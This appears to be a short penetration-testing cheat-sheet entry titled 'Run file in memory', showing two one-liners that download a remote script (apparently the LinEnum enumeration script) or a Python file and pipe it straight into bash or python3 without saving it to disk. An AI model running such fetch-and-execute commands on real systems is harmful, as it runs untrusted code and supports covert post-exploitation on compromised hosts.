# Run file in memory

#### Curl

```
curl http://website.org/linuenum.sh | bash
```

#### Wget

```
wget -qO- http://website.org/hello.py | python3
```
